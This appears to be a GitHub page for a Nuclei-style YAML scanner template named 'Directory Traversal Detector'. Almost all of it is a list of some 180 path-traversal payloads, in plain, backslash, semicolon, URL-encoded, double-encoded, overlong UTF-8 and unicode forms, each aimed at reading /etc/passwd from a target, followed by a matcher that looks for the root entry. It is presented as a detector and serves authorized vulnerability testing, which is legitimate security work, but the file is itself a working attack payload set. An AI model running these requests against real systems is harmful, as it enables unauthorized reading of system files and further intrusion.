-
Notifications
You must be signed in to change notification settings - Fork 1
/
path-traversal.yaml
189 lines (184 loc) · 13.7 KB
/
path-traversal.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
id: path-traversal
info:
name: Directory Traversal Detector
author: NullFuzz
severity: critical
description: path traversal
tags: traversal
requests:
- method: GET
path:
- "{{BaseURL}}/etc/passwd"
- "{{BaseURL}}../etc/passwd"
- "{{BaseURL}}../../etc/passwd"
- "{{BaseURL}}../../../etc/passwd"
- "{{BaseURL}}../../../../etc/passwd"
- "{{BaseURL}}../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../../../etc/passwd"
- "{{BaseURL}}../../../../../../../../../../etc/passwd"
- '{{BaseURL}}\etc/passwd'
- '{{BaseURL}}..\etc/passwd'
- '{{BaseURL}}..\..\etc/passwd'
- '{{BaseURL}}..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\..\..\..\..\..\..\..\..\..\..\etc/passwd'
- '{{BaseURL}}..\/etc/passwd'
- '{{BaseURL}}..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd'
- '{{BaseURL}}..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd'
- "{{BaseURL}}....//etc/passwd"
- "{{BaseURL}}....//....//etc/passwd"
- "{{BaseURL}}....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//....//....//....//....//....//etc/passwd"
- "{{BaseURL}}....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
- '{{BaseURL}}....\/etc/passwd'
- '{{BaseURL}}....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
- '{{BaseURL}}....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd'
- "{{BaseURL}}..;/etc/passwd"
- "{{BaseURL}}..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd"
- "{{BaseURL}}..././etc/passwd"
- "{{BaseURL}}..././..././etc/passwd"
- "{{BaseURL}}..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././..././..././..././..././..././etc/passwd"
- "{{BaseURL}}..././..././..././..././..././..././..././..././..././..././..././etc/passwd"
- '{{BaseURL}}...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd'
- '{{BaseURL}}...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd'
- "{{BaseURL}}%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd"
- "{{BaseURL}}/%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
- "{{BaseURL}}%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
- "{{BaseURL}}%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200